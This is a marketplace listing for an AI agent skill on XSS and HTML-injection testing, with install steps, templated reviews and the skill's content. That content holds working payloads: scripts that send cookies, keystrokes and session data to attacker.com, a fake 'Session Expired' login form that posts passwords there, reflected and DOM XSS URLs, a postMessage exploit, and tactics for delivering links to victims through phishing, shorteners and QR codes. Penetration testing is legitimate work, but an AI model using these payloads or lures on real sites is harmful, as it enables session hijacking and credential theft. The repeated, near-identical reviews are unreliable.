Execute comprehensive client-side injection vulnerability assessments on web applications to identify XSS and HTML injection flaws, demonstrate exploitation techniques for session hijacking and credential theft, and validate input sanitization and output encoding mechanisms. This skill enables systematic detection and exploitation across stored, reflected, and DOM-based attack vectors.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versioncross-site-scripting-and-html-injection-testingExecute the skills CLI command in your project's root directory to begin installation:
Fetches cross-site-scripting-and-html-injection-testing from sickn33/antigravity-awesome-skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate cross-site-scripting-and-html-injection-testing. Access via /cross-site-scripting-and-html-injection-testing in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
0
total installs
0
this week
31.1K
GitHub stars
0
upvotes
Run in your terminal
0
installs
0
this week
31.1K
stars
Execute comprehensive client-side injection vulnerability assessments on web applications to identify XSS and HTML injection flaws, demonstrate exploitation techniques for session hijacking and credential theft, and validate input sanitization and output encoding mechanisms. This skill enables systematic detection and exploitation across stored, reflected, and DOM-based attack vectors.
Locate areas where user input is reflected in responses:
# Common injection vectors
- Search boxes and query parameters
- User profile fields (name, bio, comments)
- URL fragments and hash values
- Error messages displaying user input
- Form fields with client-side validation only
- Hidden form fields and parameters
- HTTP headers (User-Agent, Referer)
Insert test strings to observe application behavior:
<!-- Basic reflection test -->
<test123>
<!-- Script tag test -->
<script>alert('XSS')</script>
<!-- Event handler test -->
<img src=x onerror=alert('XSS')>
<!-- SVG-based test -->
<svg onload=alert('XSS')>
<!-- Body event test -->
<body onload=alert('XSS')>
Monitor for:
Stored XSS Indicators:
Reflected XSS Indicators:
DOM-Based XSS Indicators:
Target areas with persistent user content:
- Comment sections and forums
- User profile fields (display name, bio, location)
- Product reviews and ratings
- Private messages and chat systems
- File upload metadata (filename, description)
- Configuration settings and preferences
<!-- Cookie stealing payload -->
<script>
document.location='http://attacker.com/steal?c='+document.cookie
</script>
<!-- Keylogger injection -->
<script>
document.onkeypress=function(e){
new Image().src='http://attacker.com/log?k='+e.key;
}
</script>
<!-- Session hijacking -->
<script>
fetch('http://attacker.com/capture',{
method:'POST',
body:JSON.stringify({cookies:document.cookie,url:location.href})
})
</script>
<!-- Phishing form injection -->
<div id="login">
<h2>Session Expired - Please Login</h2>
<form action="http://attacker.com/phish" method="POST">
Username: <input name="user"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login">
</form>
</div>
Build URLs containing XSS payloads:
# Basic reflected payload
https://target.com/search?q=<script>alert(document.domain)</script>
# URL-encoded payload
https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E
# Event handler in parameter
https://target.com/page?name="><img src=x onerror=alert(1)>
# Fragment-based (for DOM XSS)
https://target.com/page#<script>alert(1)</script>
Techniques for delivering reflected XSS to victims:
1. Phishing emails with crafted links
2. Social media message distribution
3. URL shorteners to obscure payload
4. QR codes encoding malicious URLs
5. Redirect chains through trusted domains
Locate JavaScript functions that process user input:
// Dangerous sinks
document.write()
document.writeln()
element.innerHTML
element.outerHTML
element.insertAdjacentHTML()
eval()
setTimeout()
setInterval()
Function()
location.href
location.assign()
location.replace()
Locate where user-controlled data enters the application:
// User-controllable sources
location.hash
location.search
location.href
document.URL
document.referrer
window.name
postMessage data
localStorage/sessionStorage
// Hash-based injection
https://target.com/page#<img src=x onerror=alert(1)>
// URL parameter injection (processed client-side)
https://target.com/page?default=<script>alert(1)</script>
// PostMessage exploitation
// On attacker page:
<iframe src="https://target.com/vulnerable"></iframe>
<script>
frames[0].postMessage('<img src=x onerror=alert(1)>','*');
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
sickn33/antigravity-awesome-skills
anthropics/claude-code
mblode/agent-skills
github/awesome-copilot
leonxlnx/taste-skill
erichowens/some_claude_skills
cross-site-scripting-and-html-injection-testing is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
I recommend cross-site-scripting-and-html-injection-testing for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
cross-site-scripting-and-html-injection-testing reduced setup friction for our internal harness; good balance of opinion and flexibility.
cross-site-scripting-and-html-injection-testing reduced setup friction for our internal harness; good balance of opinion and flexibility.
I recommend cross-site-scripting-and-html-injection-testing for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
Registry listing for cross-site-scripting-and-html-injection-testing matched our evaluation — installs cleanly and behaves as described in the markdown.
Useful defaults in cross-site-scripting-and-html-injection-testing — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
Solid pick for teams standardizing on skills: cross-site-scripting-and-html-injection-testing is focused, and the summary matches what you get after install.
cross-site-scripting-and-html-injection-testing is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
cross-site-scripting-and-html-injection-testing fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
showing 1-10 of 39